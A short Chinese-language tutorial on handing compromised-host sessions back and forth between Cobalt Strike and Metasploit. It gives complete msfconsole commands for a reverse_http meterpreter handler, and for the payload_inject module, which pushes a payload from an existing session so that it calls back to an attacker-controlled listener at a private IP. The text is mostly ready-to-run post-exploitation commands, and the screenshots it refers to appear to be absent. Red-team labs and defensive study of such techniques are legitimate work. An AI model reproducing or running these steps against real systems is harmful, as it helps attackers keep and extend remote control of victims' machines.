cs派生给msf
环境:msf6 + cs4.8
条件:目标已上线cs,获得控制权
1)在msf上启用reverse_http模块监听本地端口:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4444
2)在cs上创建一个foreign http监听,ip和端口设置为msf监听的ip和端口:
Foreign监听器支持与其他软件的监听器进行派生(spawn)
3)右键 —> 凭证提权 —> 新建会话 —> 选择创建的foreign http监听:
msf成功拿到会话:
msf派生给cs
条件:msf已获取meterpreter shell
在cs上创建一个http beacon的监听器:
msf启用payload_inject模块,将ip和端口设置为cs监听的ip和端口:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4567
set session 1
set DisablePayloadHandler true
注意:msf的payload和cs的监听器要保持一致
cs成功拿到会话: